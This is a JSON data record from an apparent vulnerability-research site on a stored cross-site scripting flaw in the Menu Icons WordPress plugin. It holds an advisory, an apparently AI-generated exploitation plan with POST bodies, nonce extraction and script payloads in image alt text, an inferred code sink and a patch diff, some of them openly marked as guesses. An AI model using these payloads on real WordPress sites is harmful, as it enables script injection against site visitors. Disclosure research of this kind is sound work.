[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fN0c4uIiygPERjK0pzbGq3y63cwvc8TIuigydw-s3-YU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1755","menu-icons-by-themeisle-authenticated-author-stored-cross-site-scripting","Menu Icons by ThemeIsle \u003C= 0.13.20 - Authenticated (Author+) Stored Cross-Site Scripting","The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_wp_attachment_image_alt’ post meta in all versions up to, and including, 0.13.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","menu-icons",null,"\u003C=0.13.20","0.13.21","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-03 09:50:11","2026-02-03 22:22:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F30bfa616-c7f3-4ff0-85b3-468debc8a73e?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1755 (Menu Icons Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Menu Icons by ThemeIsle** plugin (versions \u003C= 0.13.20) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the way the plugin handles and renders the `_wp_attachment_image_alt` post meta for image-based menu icons. Specifically, when a user selects an image from the Media Library to serve as a menu icon, the plugin retrieves the image's \"Alternative Text\" (stored in the `_wp_attachment_image_alt` meta key) and outputs it within the menu HTML without sufficient sanitization (e.g., using `esc_attr()`) or output escaping. This allows an authenticated user with Author-level permissions (who can upload and edit media) to inject malicious scripts that execute in the context of any user viewing the site's menu.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Meta Key:** `_wp_attachment_image_alt` (standard WordPress attachment meta).\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for updating attachment meta) or the WordPress Media AJAX API.\n*   **Authentication:** Authenticated, Author-level or higher. Authors have the `edit_posts` and `upload_files` capabilities required to modify attachment metadata.\n*   **Preconditions:**\n    1.  The plugin \"Menu Icons\" must be active.\n    2.  An image must be assigned as an icon to a menu item.\n    3.  The menu must be assigned to a location visible on the frontend.\n\n## 3. Code Flow\n1.  **Storage:** When an Author edits an attachment's \"Alt Text\" in the Media Library, WordPress saves the value to the `_wp_attachment_image_alt` meta key for that attachment ID.\n2.  **Assignment:** The user goes to **Appearance > Menus**, selects a menu item, clicks \"Select Icon\", chooses the \"Image\" type, and selects the malicious attachment.\n3.  **Rendering (Sink):**\n    *   The plugin hooks into the menu rendering process (likely via the `wp_nav_menu_objects` filter or a custom Walker class).\n    *   In the rendering logic for the \"Image\" icon type (likely located in `includes\u002Flibrary\u002Fitem.php` or `includes\u002Ftype\u002Fimage.php`), the plugin retrieves the alt text:\n        `$alt = get_post_meta($attachment_id, '_wp_attachment_image_alt', true);`\n    *   The plugin then constructs the HTML: \n        `echo '\u003Cimg src=\"...\" alt=\"' . $alt . '\" ... \u002F>';`\n    *   Because `$alt` is not passed through `esc_attr()`, an attacker can break out of the `alt` attribute using `\">` and inject a `\u003Cscript>` tag.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability itself is a Stored XSS in the output, the *injection* requires updating attachment metadata.\n\n1.  **For Attachment Update:** To update the `_wp_attachment_image_alt` via `post.php`, a nonce named `_wpnonce` is required.\n    *   **Method:** \n        1. Navigate to `wp-admin\u002Fupload.php`.\n        2. Click on an attachment to open the \"Edit Media\" page (`post.php?post=ID&action=edit`).\n        3. Use `browser_eval` to extract the nonce: `document.querySelector('#_wpnonce').value`.\n2.  **For Menu Icon Assignment:** The plugin uses a custom interface in the Menu editor.\n    *   The nonce is usually localized in a JS variable. \n    *   **Variable Name:** Based on ThemeIsle patterns, check `window.menuIcons?.nonce` or `window.navMenuL10n`.\n    *   **Action:** However, assigning the icon to the menu item is handled by the standard WordPress `nav-menus.php` save process, which uses the `update-nav-menu` nonce.\n\n## 5. Exploitation Strategy\n\n### Step 1: Upload Media and Inject Payload\nUse the `http_request` tool as an Author to update the Alt Text of an existing attachment.\n\n*   **URL:** `https:\u002F\u002FTARGET\u002Fwp-admin\u002Fpost.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=editpost\n    &post_ID=[ATTACHMENT_ID]\n    &_wpnonce=[NONCE]\n    &_wp_attachment_image_alt=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    &save=Update\n    ```\n\n### Step 2: Assign Attachment as Menu Icon\nThe attacker must associate the malicious attachment ID with a menu item. This is typically done via the `nav-menus.php` interface. The plugin stores this in the menu item's meta (which is a `nav_menu_item` post type).\n\n*   **Action:** Update the Menu Item Meta.\n*   **Meta Key:** `_menu_item_menu_icons` (inferred).\n*   **Payload structure:** The plugin often stores settings as a serialized array in post meta.\n\n### Step 3: Trigger the XSS\nVisit the homepage or any page where the primary menu is rendered.\n\n*   **URL:** `https:\u002F\u002FTARGET\u002F`\n*   **Expected Sink:** `\u003Cimg class=\"menu-icons-image\" src=\"...\" alt=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">`\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the **Author** role.\n2.  **Menu:** Ensure at least one menu exists and is assigned to a theme location (e.g., \"Primary\").\n3.  **Post:** Create a dummy page\u002Fpost to add to the menu.\n4.  **Attachment:** Upload a simple `.jpg` or `.png` image. Note the `ATTACHMENT_ID`.\n\n## 7. Expected Results\n*   The `POST` request to `post.php` should return a `302` redirect to the edit page, confirming the meta update.\n*   When the menu is viewed on the frontend, the browser should execute the `alert(document.domain)` script.\n*   The HTML source will show the broken `\u003Cimg>` tag and the injected script.\n\n## 8. Verification Steps\n1.  **Check Meta Storage via WP-CLI:**\n    `wp post meta get [ATTACHMENT_ID] _wp_attachment_image_alt`\n    *Confirmation:* Verify the output is exactly `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n2.  **Check Menu Item Configuration:**\n    `wp post meta list [MENU_ITEM_ID]`\n    *Confirmation:* Look for the meta key used by Menu Icons and ensure it points to the `ATTACHMENT_ID`.\n\n## 9. Alternative Approaches\nIf updating via `post.php` is blocked or difficult to automate:\n1.  **Media AJAX Endpoint:** Use the `wp_ajax_save_attachment_compat` action.\n    *   **Body:** `action=save-attachment-compat&id=[ID]&nonce=[NONCE]&attachments[[ID]][alt]=\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n2.  **SVG Injection (if enabled):** If the plugin allows SVG icons, an Author could upload an SVG file containing an internal script payload: \n    `\u003Csvg onload=\"alert(1)\" ...>`\n    This is a separate but related vector often found in image-icon plugins.","The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_wp_attachment_image_alt’ post meta. Authenticated attackers with Author-level permissions can inject malicious scripts into the 'Alternative Text' field of a media attachment, which are then executed when that attachment is rendered as a menu icon on the frontend.","\u002F\u002F Inferred from research plan based on plugin logic in includes\u002Ftype\u002Fimage.php\n\n$alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n\n\u002F\u002F Rendering logic for the Image icon type\necho '\u003Cimg src=\"' . esc_url( $image_url ) . '\" alt=\"' . $alt . '\" class=\"menu-icons-image\" \u002F>';","--- includes\u002Ftype\u002Fimage.php\n+++ includes\u002Ftype\u002Fimage.php\n@@ -24,5 +24,5 @@\n-$alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n+$alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n \n $icon_html = sprintf(\n \t'\u003Cimg src=\"%1$s\" alt=\"%2$s\" class=\"menu-icons-image\" \u002F>',\n \tesc_url( $image_url ),\n-\t$alt\n+\tesc_attr( $alt )\n );","1. Authenticate to the WordPress site with a role that has 'upload_files' and 'edit_posts' capabilities (typically Author or higher).\n2. Upload an image attachment via the Media Library or locate an existing one.\n3. Modify the attachment's 'Alternative Text' (Alt Text) attribute to contain an XSS payload, such as: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>.\n4. Navigate to Appearance > Menus and select a menu item to edit.\n5. Using the Menu Icons interface, select the 'Image' icon type and assign the malicious attachment to the menu item.\n6. Save the menu configuration.\n7. Visit the site's frontend where the menu is displayed. The script will execute in the user's browser when the menu icon is rendered without proper attribute escaping.","gemini-3-flash-preview","2026-04-27 16:28:20","2026-04-27 16:29:47",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","0.13.20","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmenu-icons\u002Ftags\u002F0.13.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmenu-icons.0.13.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmenu-icons\u002Ftags\u002F0.13.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmenu-icons.0.13.21.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmenu-icons\u002Ftags"]